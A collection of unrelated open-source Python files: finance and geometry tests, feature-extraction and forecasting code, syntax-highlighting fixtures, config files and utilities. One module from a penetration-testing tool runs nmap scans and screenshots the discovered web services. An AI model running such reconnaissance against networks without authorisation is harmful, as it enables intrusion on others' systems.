print("=====> Prior COV")
print(prior_cov)
exact_cov = np.zeros([4, 4])
exact_cov[0, :] = np.array([0.004900, 0.006720, 0.010500, 0.016800])
exact_cov[1, :] = np.array([0.006720, 0.014400, 0.025200, 0.036000])
exact_cov[2, :] = np.array([0.010500, 0.025200, 0.090000, 0.144000])
exact_cov[3, :] = np.array([0.016800, 0.036000, 0.144000, 0.360000])
exact_cov = 1 / 120 * exact_cov # tau * cov
self.assertTrue(np.allclose(prior_cov, exact_cov, rtol=0, atol=1e-6))
print("=====> Tau")
print(bl.tau)
self.assertAlmostEqual(bl.tau, 0.0083333, places=6)
def test_bl_model_views(self):
bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points)
bl.add_relative_view(2, 0, 0.1, 0.02481598)
bl.add_absolute_view(1, 0.03, 0.010954451)
print("=====> P")
print(bl.P)
exact_P = np.zeros([2, 4])
exact_P[0, :] = np.array([-1.0, 0.0, 1.0, 0.0])
exact_P[1, :] = np.array([0.0, 1.0, 0.0, 0.0])
self.assertTrue(np.allclose(bl.P, exact_P, rtol=0, atol=1e-7))
print("=====> Q")
print(bl.Q)
exact_Q = np.zeros([2, 1])
exact_Q[0, 0] = 0.1
exact_Q[1, 0] = 0.03
self.assertTrue(np.allclose(bl.Q, exact_Q, rtol=0, atol=1e-7))
print("=====> OMEGA")
print(bl.Omega)
exact_Omega = np.zeros([2, 2])
exact_Omega[0, 0] = 0.00061583
exact_Omega[1, 1] = 0.00012000
self.assertTrue(np.allclose(bl.Omega, exact_Omega, rtol=0, atol=1e-7))
def test_bl_model_posterior(self):
bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points)
bl.add_relative_view(2, 0, 0.1, 0.02481598)
bl.add_absolute_view(1, 0.03, 0.010954451)
posterior_mean, posterior_cov = bl.calculate_posterior()
print("=====> POSTERIOR Mean")
print(posterior_mean)
exact_mean = np.zeros(4)
exact_mean[0] = 0.016769
exact_mean[1] = 0.037529
exact_mean[2] = 0.124758
exact_mean[3] = 0.226997
self.assertTrue(np.allclose(posterior_mean, exact_mean, rtol=0, atol=1e-6))
print("=====> POSTERIOR COV")
print(posterior_cov)
exact_cov = np.zeros([4, 4])
exact_cov[0, :] = np.array([0.004928, 0.006747, 0.010533, 0.016862])
exact_cov[1, :] = np.array([0.006747, 0.014455, 0.025269, 0.036091])
exact_cov[2, :] = np.array([0.010533, 0.025269, 0.090320, 0.144533])
exact_cov[3, :] = np.array([0.016862, 0.036091, 0.144533, 0.361961])
self.assertTrue(np.allclose(posterior_cov, exact_cov, rtol=0, atol=1e-6))
if __name__ == '__main__':
unittest.main()
|
tests/unpickle-strtree.py | Jeremiah-England/Shapely | 2,382 | 11096700 | # See test_strtree.py::test_pickle_persistence
import sys
import os
sys.path.append(os.getcwd())
import pickle
from shapely.geometry import Point
from shapely.geos import geos_version
if __name__ == "__main__":
pickled_strtree = sys.stdin.buffer.read()
print("received pickled strtree:", repr(pickled_strtree))
strtree = pickle.loads(pickled_strtree)
# Exercise API.
print("calling \"query()\"...")
strtree.query(Point(0, 0))
if geos_version >= (3, 6, 0):
print("calling \"nearest()\"...")
strtree.nearest(Point(0, 0))
else:
print("skipping \"nearest()\"")
print("done")
|
pylayers/antprop/examples/ex_antenna2.py | usmanwardag/pylayers | 143 | 11096710 | from pylayers.antprop.antenna import *
from pylayers.antprop.antvsh import *
import matplotlib.pylab as plt
from numpy import *
import pdb
"""
This test :
1 : loads a measured antenna
2 : applies an electrical delay obtained from data with getdelay method
    3 : evaluates the antenna vsh coefficients with a downsampling factor of 2
    4 : displays the first 16 coefficients
"""
filename = 'S1R1.mat'
A = Antenna(filename,directory='ant/UWBAN/Matfile')
#plot(freq,angle(A.Ftheta[:,maxPowerInd[1],maxPowerInd[2]]*exp(2j*pi*freq.reshape(len(freq))*electricalDelay)))
freq = A.fa.reshape(104,1,1)
delayCandidates = arange(-10,10,0.001)
electricalDelay = A.getdelay(freq,delayCandidates)
disp('Electrical Delay = ' + str(electricalDelay)+' ns')
A.Ftheta = A.Ftheta*exp(2*1j*pi*freq*electricalDelay)
A.Fphi = A.Fphi*exp(2*1j*pi*freq*electricalDelay)
dsf = 2
#
# Calculate Vector Spherical Harmonics
#
A = vsh(A,dsf)
v = np.abs(A.C.Br.s1)
u = np.nonzero(v==v.max())
plt.figure(figsize=(15,15))
for l in range(16):
plt.subplot(4,4,l+1)
plt.plot(np.real(A.C.Br.s1[:,l,0]),np.imag(A.C.Br.s1[:,l,0]),'k')
plt.plot(np.real(A.C.Br.s1[:,l,1]),np.imag(A.C.Br.s1[:,l,1]),'b')
plt.plot(np.real(A.C.Br.s1[:,l,2]),np.imag(A.C.Br.s1[:,l,2]),'r')
plt.plot(np.real(A.C.Br.s1[:,l,2]),np.imag(A.C.Br.s1[:,l,2]),'g')
plt.axis([-0.6,0.6,-0.6,0.6])
plt.title('l='+str(l))
plt.show()
|
greykite/sklearn/uncertainty/base_uncertainty_model.py | kenzie-q/greykite | 1,503 | 11096727 | # BSD 2-CLAUSE LICENSE
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# original author: <NAME>
"""Defines the base uncertainty model class. All uncertainty models should inherit this class."""
from abc import abstractmethod
from typing import Dict
from typing import Optional
import pandas as pd
class BaseUncertaintyModel:
"""The base uncertainty model.
Attributes
----------
uncertainty_dict : `dict` [`str`, any]
The uncertainty model specification. It should have the following keys:
"uncertainty_method": a string that is in
`~greykite.sklearn.uncertainty.uncertainty_methods.UncertaintyMethodEnum`.
"params": a dictionary that includes any additional parameters needed by the uncertainty method.
uncertainty_method : `str` or None
The name of the uncertainty model.
Must be in `~greykite.sklearn.uncertainty.uncertainty_methods.UncertaintyMethodEnum`.
params : `dict` [`str`, any] or None
The parameters to be fed into the uncertainty model.
train_df : `pandas.DataFrame` or None
The data used to fit the uncertainty model.
uncertainty_model : any or None
The uncertainty model.
pred_df : `pandas.DataFrame`
The prediction result df.
"""
def __init__(
self,
uncertainty_dict: Dict[str, any],
**kwargs):
self.uncertainty_dict = uncertainty_dict
for key, value in kwargs.items():
setattr(self, key, value)
# Set by ``fit`` method.
self.uncertainty_method: Optional[str] = None
self.params: Optional[dict] = None
self.train_df: Optional[pd.DataFrame] = None
self.uncertainty_model: Optional[any] = None
# Set by ``predict`` method.
self.pred_df: Optional[pd.DataFrame] = None
@abstractmethod
def _check_input(self):
"""Checks that necessary input are provided in ``self.uncertainty_dict`` and ``self.train_df``.
To be called after setting ``self.train_df`` in ``self.fit``.
Every subclass need to override this method to check their own inputs.
Do not raise errors other than
`~greykite.sklearn.uncertainty.exceptions.UncertaintyError`,
since this type of error will be catched and won't fail the whole pipeline.
"""
if self.uncertainty_dict is None:
self.uncertainty_dict = {}
def fit(
self,
train_df: pd.DataFrame):
"""Fits the uncertainty model.
Parameters
----------
train_df : `pandas.DataFrame`
The training data.
"""
self.train_df = train_df
def predict(
self,
fut_df: pd.DataFrame):
"""Predicts the uncertainty columns for ``fut_df``.
Parameters
----------
fut_df : `pandas.DataFrame`
The data used for prediction.
"""
pass
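# --- Illustrative sketch (editor addition, not part of Greykite itself) ---
# A minimal subclass showing how the hooks above are meant to be used. The class
# name, the "width" parameter and the ``y`` column are hypothetical choices made
# purely for illustration.
class ConstantWidthUncertaintyModel(BaseUncertaintyModel):
    """Toy model that places a fixed ``width`` band around a point forecast column ``y``."""
    def _check_input(self):
        super()._check_input()
        # Default to a band of +/- 1.0 when no parameters are supplied.
        self.params = self.uncertainty_dict.get("params", {"width": 1.0})
    def fit(self, train_df: pd.DataFrame):
        super().fit(train_df)  # stores ``train_df`` on the instance
        self._check_input()
        self.uncertainty_model = self.params["width"]
    def predict(self, fut_df: pd.DataFrame):
        self.pred_df = fut_df.copy()
        self.pred_df["y_lower"] = self.pred_df["y"] - self.uncertainty_model
        self.pred_df["y_upper"] = self.pred_df["y"] + self.uncertainty_model
        return self.pred_df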
|
test/test_wrong_exception_protocolbase_getitem.py | Duiesel/python-jsonschema-objects | 329 | 11096739 | import pytest
import python_jsonschema_objects as pjo
@pytest.fixture
def base_schema():
return {
"title": "example",
"type": "object",
"additionalProperties": False,
"properties": {
"dictLike": {"additionalProperties": {"type": "integer"}, "type": "object"}
},
}
def test_wrong_exception_protocolbase_getitem(base_schema):
"""
    To declare a dict-like object in JSON Schema, we declare it as an object
    with additionalProperties.
    When trying to use it as a dict, for instance testing whether a key is in
    the dictionary, methods like __contains__ in ProtocolBase expect
    __getitem__ to raise a KeyError. __getitem__ calls __getattr__ without any
    exception handling, which raises an AttributeError (needed for getattr to
    behave properly).
    The fix is to handle AttributeError in __getitem__ and raise KeyError
    instead (a minimal sketch of such a fix follows the test below).
"""
builder = pjo.ObjectBuilder(base_schema)
ns = builder.build_classes()
t = ns.Example(dictLike={"a": 0, "b": 1})
t.validate()
assert "a" in t.dictLike
assert "c" not in t.dictLike
assert getattr(t, "not_present", None) is None
with pytest.raises(AttributeError):
assert "a" not in t.notAnAttribute
if __name__ == "__main__":
test_wrong_exception_protocolbase_getitem(base_schema())
|
unsilence/lib/intervals/Interval.py | RomanKornev/unsilence | 236 | 11096756 | class Interval:
"""
Represents a section in time where the media file is either silent or audible
"""
def __init__(self, start=0, end=0, is_silent=False):
"""
Initializes an Interval object
:param start: Start time of the interval in seconds
:param end: End time of the interval in seconds
:param is_silent: Whether the interval is silent or not
"""
self.__start = start
self.__end = end
self.__duration = self.__end - self.__start
self.is_silent = is_silent
@property
def start(self):
"""
Get the start time
:return: start time in seconds
"""
return self.__start
@start.setter
def start(self, new_start):
"""
Sets the new start time and updates the duration
:param new_start: start time in seconds
:return: None
"""
self.__start = new_start
self.__duration = self.__end - self.__start
@property
def end(self):
"""
Get the end time
:return: end time in seconds
"""
return self.__end
@end.setter
def end(self, new_end):
"""
Sets the new end time and updates the duration
:param new_end: start time in seconds
:return: None
"""
self.__end = new_end
self.__duration = self.__end - self.__start
@property
def duration(self):
"""
Returns the duration of the interval
:return: Duration of the interval
"""
return self.__duration
def enlarge_audible_interval(self, stretch_time, is_start_interval=False, is_end_interval=False):
"""
        Enlarges/shrinks the audio interval, depending on whether it is silent or not
:param stretch_time: Time the interval should be enlarged/shrunken
:param is_start_interval: Whether the current interval is at the start (should not enlarge/shrink)
:param is_end_interval: Whether the current interval is at the end (should not enlarge/shrink)
:return: None
"""
if stretch_time >= self.duration:
raise Exception("Stretch time to large, please choose smaller size")
stretch_time_part = (-1 if self.is_silent else 1) * stretch_time / 2
if not is_start_interval:
self.start -= stretch_time_part
if not is_end_interval:
self.end += stretch_time_part
def copy(self):
"""
Creates a deep copy of this Interval
:return: Interval deepcopy
"""
return Interval(self.start, self.end, self.is_silent)
def serialize(self):
"""
Serializes the current interval into a dict format
:return: serialized dict
"""
return {"start": self.start, "end": self.end, "is_silent": self.is_silent}
@staticmethod
def deserialize(serialized_obj: dict):
"""
        Deserializes a previously serialized Interval and generates a new Interval from its data
:param serialized_obj: previously serializes Interval (type dict)
:return: Interval
"""
return Interval(serialized_obj["start"], serialized_obj["end"], serialized_obj["is_silent"])
def __repr__(self):
"""
String representation
:return: String representation
"""
return f"<Interval start={self.start} end={self.end} duration={self.duration} is_silent={self.is_silent}>"
|
mahotas/features/tas.py | langner/mahotas | 541 | 11096777 |
# Copyright (C) 2008-2012, <NAME> <<EMAIL>>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
# Carnegie Mellon University
#
# License: MIT (see COPYING file)
import numpy as np
from ..convolve import convolve
from ..thresholding import otsu
__all__ = ['pftas', 'tas']
_M2 = np.ones((3, 3))
_M2[1, 1] = 10
_bins2 = np.arange(11)
_M3 = np.ones((3, 3, 3))
_M3[1,1,1] = _M3.sum() + 1
_bins3 = np.arange(28)
def _tas(img, thresh, margin):
if len(img.shape) == 2:
M = _M2
bins = _bins2
saved = 9
elif len(img.shape) == 3:
M = _M3
bins = _bins3
saved = 27
else:
raise ValueError('mahotas.tas: Cannot compute TAS for image of %s dimensions' % len(img.shape))
def _ctas(img):
V = convolve(img.astype(np.uint8), M)
values,_ = np.histogram(V, bins=bins)
values = values[:saved]
s = values.sum()
if s > 0:
return values/float(s)
return values
def _compute(bimg):
alltas.append(_ctas(bimg))
allntas.append(_ctas(~bimg))
alltas = []
allntas = []
total = np.sum(img > thresh)
mu = ((img > thresh)*img).sum() / (total + 1e-8)
_compute( (img > mu - margin) * (img < mu + margin) )
_compute(img > mu - margin)
_compute(img > mu)
return np.concatenate(alltas + allntas)
def tas(img):
'''
values = tas(img)
Compute Threshold Adjacency Statistics
TAS were presented by Hamilton et al. in "Fast automated cell phenotype
image classification" (http://www.biomedcentral.com/1471-2105/8/110)
Also returns a version computed on the negative of the binarisation defined
by Hamilton et al.
See also pftas() for a variation without any hardcoded parameters.
Parameters
----------
img : ndarray, 2D or 3D
input image
Returns
-------
values : ndarray
A 1-D ndarray of feature values
See Also
--------
pftas : Parameter free TAS
'''
return _tas(img, 30, 30)
def pftas(img, T=None):
'''
values = pftas(img, T={mahotas.threshold.otsu(img)})
Compute parameter free Threshold Adjacency Statistics
TAS were presented by Hamilton et al. in "Fast automated cell phenotype
image classification" (http://www.biomedcentral.com/1471-2105/8/110)
The current version is an adapted version which is free of parameters. The
thresholding is done by using Otsu's algorithm (or can be pre-computed and
passed in by setting `T`), the margin around the mean of pixels to be
included is the standard deviation. This was first published by Coelho et
al. in "Structured Literature Image Finder: Extracting Information from
Text and Images in Biomedical Literature"
(http://www.springerlink.com/content/60634778710577t0/)
Also returns a version computed on the negative of the binarisation defined
by Hamilton et al.
Use tas() to get the original version of the features.
Parameters
----------
img : ndarray, 2D or 3D
input image
T : integer, optional
Threshold to use (default: compute with otsu)
Returns
-------
values : ndarray
A 1-D ndarray of feature values
'''
if T is None:
T = otsu(img)
pixels = img[img > T].ravel()
if len(pixels) == 0:
std = 0
else:
std = pixels.std()
return _tas(img, T, std)
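# --- Illustrative usage sketch (editor addition, not part of upstream mahotas) ---
# pftas() needs only an image: the threshold defaults to Otsu's and the margin to
# the standard deviation of the above-threshold pixels. For a 2D input, six 9-bin
# histograms are concatenated, giving a 54-element feature vector.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    img = (rng.rand(64, 64) * 255).astype(np.uint8)  # synthetic image, illustration only
    print(pftas(img).shape)  # (54,)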
|
test/functions/lambda7.py | kylebarron/MagicPython | 1,482 | 11096790 |
anon = lambda a, c={'key':
555}, e=fff: None
anon : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
lambda : meta.lambda-function.python, source.python, storage.type.function.lambda.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
a : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
, : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.parameters.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
c : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
= : keyword.operator.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
{ : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.dict.begin.python, source.python
' : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.string.begin.python, source.python, string.quoted.single.python
key : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, string.quoted.single.python
' : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.string.end.python, source.python, string.quoted.single.python
: : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.dict.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
555 : constant.numeric.dec.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
} : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.dict.end.python, source.python
, : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.parameters.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
e : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
= : keyword.operator.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
fff : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
: : meta.lambda-function.python, punctuation.section.function.lambda.begin.python, source.python
: source.python
None : constant.language.python, source.python
|
axes/__init__.py | LucienC/django-axes | 831 | 11096813 |
from pkg_resources import get_distribution
import django
if django.VERSION < (3, 2):
default_app_config = "axes.apps.AppConfig"
__version__ = get_distribution("django-axes").version
|
17-it-generator/tree/extra/drawtree.py | fluentpython/example-code-2e | 990 | 11096833 | from tree import tree
SP = '\N{SPACE}'
HLIN = '\N{BOX DRAWINGS LIGHT HORIZONTAL}' # ─
ELBOW = f'\N{BOX DRAWINGS LIGHT UP AND RIGHT}{HLIN*2}{SP}' # └──
TEE = f'\N{BOX DRAWINGS LIGHT VERTICAL AND RIGHT}{HLIN*2}{SP}' # ├──
PIPE = f'\N{BOX DRAWINGS LIGHT VERTICAL}{SP*3}' # │
def render_lines(tree_iter):
cls, _, _ = next(tree_iter)
yield cls.__name__
prefix = ''
for cls, level, last in tree_iter:
prefix = prefix[:4 * (level-1)]
prefix = prefix.replace(TEE, PIPE).replace(ELBOW, SP*4)
prefix += ELBOW if last else TEE
yield prefix + cls.__name__
def draw(cls):
for line in render_lines(tree(cls)):
print(line)
if __name__ == '__main__':
draw(BaseException)
|
build/build/root/opt/bin/py-chrome-history.py | scobiehague/dotfiles | 117 | 11096842 | <reponame>scobiehague/dotfiles<filename>build/build/root/opt/bin/py-chrome-history.py<gh_stars>100-1000
#!/usr/bin/python2
# py-chrome-history
#
# A script to convert Google Chrome's history file to the standard HTML-ish
# bookmarks file format.
#
# Copyright (c) 2011 <NAME>. This program is released under the ISC
# license, which you can find in the file LICENSE.md.
import sys, os, sqlite3
script_version = "1.1"
# html escaping code from http://wiki.python.org/moin/EscapingHtml
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
def html_escape(text):
return ''.join(html_escape_table.get(c,c) for c in text)
def sanitize(string):
res = ''
string = html_escape(string)
for i in range(len(string)):
if ord(string[i]) > 127:
res += '&#x%x;' % ord(string[i])
else:
res += string[i]
return res
def version_text():
old_out = sys.stdout
sys.stdout = sys.stderr
print "py-chrome-history", script_version
print "(c) 2011, <NAME>"
print "https://github.com/bdesham/py-chrome-bookmarks"
sys.stdout = old_out
def help_text():
version_text()
old_out = sys.stdout
sys.stdout = sys.stderr
print
print "usage: python py-chrome-history input-file output-file"
print " input-file is the Chrome history file"
print " output-file is the destination for the generated HTML bookmarks file"
sys.stdout = old_out
# check for help or version requests
if "-v" in sys.argv or "--version" in sys.argv:
version_text()
exit()
if len(sys.argv) != 3 or "-h" in sys.argv or "--help" in sys.argv:
help_text()
exit()
# the actual code here...
in_file = os.path.expanduser(sys.argv[1])
out_file = os.path.expanduser(sys.argv[2])
connection = sqlite3.connect(in_file)
curs = connection.cursor()
try:
out = open(out_file, 'w')
except IOError, e:
print >> sys.stderr, "py-chrome-history: error opening the output file."
print >> sys.stderr, e
exit()
out.write("""<!DOCTYPE NETSCAPE-Bookmark-file-1>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8' />
<title>Bookmarks</title>
<h1>Bookmarks</h1>
<dl><p>
<dl><dt><h3>History</h3>
<dl><p>""")
curs.execute("SELECT url, title FROM urls")
for row in curs:
if len(row[1]) > 0:
out.write('<dt><a href="%s">%s</a>\n' % (sanitize(row[0]), sanitize(row[1])))
connection.close()
out.write("</dl></p>\n</dl>")
out.close()
|
lib/screenscan.py | nkrios/flashlight | 197 | 11096859 | <filename>lib/screenscan.py
try:
import re
import shlex
import datetime
import subprocess
from lib.core.core import Core
from lib.screen.webscan import WebScan
from lib.core.threadpool import Worker,ThreadPool
except ImportError, err:
from lib.core.core import Core
Core.print_error(err)
class ScreenScan(WebScan):
def __init__(self, args):
self.__urls = []
self.__args = args
WebScan.__init__(self, self.__args)
def _run(self, logger):
cmd = "{0} {1}".format(Core._commands_path["nmap"], self._nmap_options)
logger._logging("START: Nmap Screen Scan: {0}".format(cmd))
cmd_list = shlex.split(cmd)
proc = subprocess.Popen(cmd_list, stdout = subprocess.PIPE, stderr = subprocess.PIPE,).communicate()
logger._logging("STOP: Nmap Screen Scan")
self.__parse_nmap_scan(logger)
def __parse_nmap_scan(self, logger):
self._result_file.seek(0)
for line in self._result_file:
for port in self._scan_options.split(","):
if re.search("{0}/open/tcp".format(port), line):
ip = line.split()[1]
if port != "443":
self.__urls.append("http://{0}:{1}".format(ip,port))
else:
self.__urls.append("https://{0}:443".format(ip))
self._result_file.close()
if self.__urls:
self.__take_screenshot(logger)
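    # Illustrative input (assumption about nmap's grepable output format): a result
    # line such as "Host: 10.0.0.5 ()  Ports: 80/open/tcp//http///" would yield the
    # URL "http://10.0.0.5:80" when port 80 is among the scanned ports.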
def __take_screenshot(self, logger):
logger._logging("START: Screen Scan {0} threads".format(self.__args.thread))
pool = ThreadPool(self.__args.thread)
for url in self.__urls:
output_file = "{0}{1}_{2}.png".format(self._output_dir, url.split("/")[2], datetime.datetime.now().strftime("%Y%m%d%H%M%S"))
phantomjs_cmd = "{0} --ignore-ssl-errors=true {1} {2} {3}".format(Core._commands_path["phantomjs"], self.__args.rasterize, url, output_file)
logger._logging("Taking screenshot: {0}".format(url.split("/")[2]))
pool.add_task(self.__run_phantomjs, phantomjs_cmd)
pool.wait_completion()
logger._logging("Finished Screenshot Scan. Results saved in {0} folder".format(self._output_dir))
def __run_phantomjs(self, cmd):
cmd_list = shlex.split(cmd)
proc = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE,).communicate()
|
configs/detection/attention_rpn/coco/attention-rpn_r50_c4_4xb2_coco_official-10shot-fine-tuning.py | BIGWangYuDong/mmfewshot | 376 | 11096860 | <reponame>BIGWangYuDong/mmfewshot
_base_ = [
'../../_base_/datasets/query_aware/few_shot_coco.py',
'../../_base_/schedules/schedule.py', '../attention-rpn_r50_c4.py',
'../../_base_/default_runtime.py'
]
# classes splits are predefined in FewShotCocoDataset
# FewShotCocoDefaultDataset predefine ann_cfg for model reproducibility
num_support_ways = 2
num_support_shots = 9
data = dict(
train=dict(
num_support_ways=num_support_ways,
num_support_shots=num_support_shots,
repeat_times=50,
dataset=dict(
type='FewShotCocoDefaultDataset',
ann_cfg=[dict(method='Attention_RPN', setting='Official_10SHOT')],
num_novel_shots=10,
classes='NOVEL_CLASSES',
instance_wise=False)),
val=dict(
classes='NOVEL_CLASSES',
ann_cfg=[
dict(
type='ann_file',
ann_file='data/coco/annotations/instances_val2017.json')
]),
test=dict(
classes='NOVEL_CLASSES',
ann_cfg=[
dict(
type='ann_file',
ann_file='data/coco/annotations/instances_val2017.json')
]),
model_init=dict(classes='NOVEL_CLASSES'))
evaluation = dict(interval=3000)
checkpoint_config = dict(interval=3000)
optimizer = dict(
lr=0.001,
momentum=0.9,
paramwise_cfg=dict(custom_keys={'roi_head.bbox_head': dict(lr_mult=2.0)}))
lr_config = dict(
warmup_iters=200, warmup_ratio=0.1, step=[
2000,
3000,
])
log_config = dict(interval=10)
runner = dict(max_iters=3000)
# load_from = 'path of base training model'
load_from = ('work_dirs/attention-rpn_r50_c4_4xb2_coco_official-base-training/'
'latest.pth')
model = dict(
frozen_parameters=['backbone'],
rpn_head=dict(
num_support_ways=num_support_ways,
num_support_shots=num_support_shots,
),
roi_head=dict(
num_support_ways=num_support_ways,
num_support_shots=num_support_shots,
),
)
|
deep-rl/lib/python2.7/site-packages/OpenGL/GL/ARB/vertex_type_2_10_10_10_rev.py | ShujaKhalid/deep-rl | 210 | 11096866 | '''OpenGL extension ARB.vertex_type_2_10_10_10_rev
This module customises the behaviour of the
OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev to provide a more
Python-friendly API
Overview (from the spec)
This extension adds the following data formats:
Two new vertex attribute data formats: a signed 2.10.10.10 and an
unsigned 2.10.10.10 vertex data format. These vertex data formats
describe a 4 component stream which can be used to store normals or
other attributes in a quantized form. Normals, tangents, binormals
and other vertex attributes can often be specified at reduced
precision without introducing noticeable artifacts, reducing the
amount of memory and memory bandwidth they consume.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/vertex_type_2_10_10_10_rev.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev import *
from OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev import _EXTENSION_NAME
def glInitVertexType2101010RevARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
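# Illustrative helper (not part of PyOpenGL): pack three signed-normalized
# components plus a 2-bit w into the GL_INT_2_10_10_10_REV bit layout
# (w in bits 30-31, z in bits 20-29, y in bits 10-19, x in bits 0-9).
def _pack_snorm_2_10_10_10_rev(x, y, z, w=0):
    def to10(v):
        # clamp to [-1, 1], scale to a signed 10-bit value, keep the two's-complement bits
        return int(round(max(-1.0, min(1.0, v)) * 511)) & 0x3FF
    return ((int(w) & 0x3) << 30) | (to10(z) << 20) | (to10(y) << 10) | to10(x)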
glVertexAttribP1uiv=wrapper.wrapper(glVertexAttribP1uiv).setInputArraySize(
'value', 1
)
glVertexAttribP2uiv=wrapper.wrapper(glVertexAttribP2uiv).setInputArraySize(
'value', 1
)
glVertexAttribP3uiv=wrapper.wrapper(glVertexAttribP3uiv).setInputArraySize(
'value', 1
)
glVertexAttribP4uiv=wrapper.wrapper(glVertexAttribP4uiv).setInputArraySize(
'value', 1
)
glVertexP2uiv=wrapper.wrapper(glVertexP2uiv).setInputArraySize(
'value', 1
)
glVertexP3uiv=wrapper.wrapper(glVertexP3uiv).setInputArraySize(
'value', 1
)
glVertexP4uiv=wrapper.wrapper(glVertexP4uiv).setInputArraySize(
'value', 1
)
glTexCoordP1uiv=wrapper.wrapper(glTexCoordP1uiv).setInputArraySize(
'coords', 1
)
glTexCoordP2uiv=wrapper.wrapper(glTexCoordP2uiv).setInputArraySize(
'coords', 1
)
glTexCoordP3uiv=wrapper.wrapper(glTexCoordP3uiv).setInputArraySize(
'coords', 1
)
glTexCoordP4uiv=wrapper.wrapper(glTexCoordP4uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP1uiv=wrapper.wrapper(glMultiTexCoordP1uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP2uiv=wrapper.wrapper(glMultiTexCoordP2uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP3uiv=wrapper.wrapper(glMultiTexCoordP3uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP4uiv=wrapper.wrapper(glMultiTexCoordP4uiv).setInputArraySize(
'coords', 1
)
glNormalP3uiv=wrapper.wrapper(glNormalP3uiv).setInputArraySize(
'coords', 1
)
glColorP3uiv=wrapper.wrapper(glColorP3uiv).setInputArraySize(
'color', 1
)
glColorP4uiv=wrapper.wrapper(glColorP4uiv).setInputArraySize(
'color', 1
)
glSecondaryColorP3uiv=wrapper.wrapper(glSecondaryColorP3uiv).setInputArraySize(
'color', 1
)
### END AUTOGENERATED SECTION |
dex/parsers.py | qintangtao/python.dex | 291 | 11096876 | __author__ = 'eric'
import re
from utils import pretty_json, small_json, yamlfy
from time import strptime, mktime
from datetime import datetime
import traceback
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
################################################################################
# Query masking and scrubbing functions
################################################################################
def scrub(e):
if isinstance(e, dict):
return scrub_doc(e)
elif isinstance(e, list):
return scrub_list(e)
else:
return None
def scrub_doc(d):
for k in d:
if k in ['$in', '$nin', '$all']:
d[k] = ["<val>"]
else:
d[k] = scrub(d[k])
if d[k] is None:
d[k] = "<val>"
return d
def scrub_list(a):
v = []
for e in a:
e = scrub(e)
if e is not None:
v.append(scrub(e))
return sorted(v)
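# Illustrative behaviour (example added for clarity, not in the original source):
# scrub() masks concrete values with "<val>" so that structurally identical
# queries can be grouped together, e.g.
#   scrub({'age': {'$gt': 21}, 'tags': {'$in': ['a', 'b']}})
#   # -> {'age': {'$gt': '<val>'}, 'tags': {'$in': ['<val>']}}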
ts_rx = re.compile('^(?P<ts>[a-zA-Z]{3} [a-zA-Z]{3} {1,2}\d+ \d{2}:\d{2}:\d{2}).*')
def get_line_time(line):
ts = None
match = ts_rx.match(line)
if match:
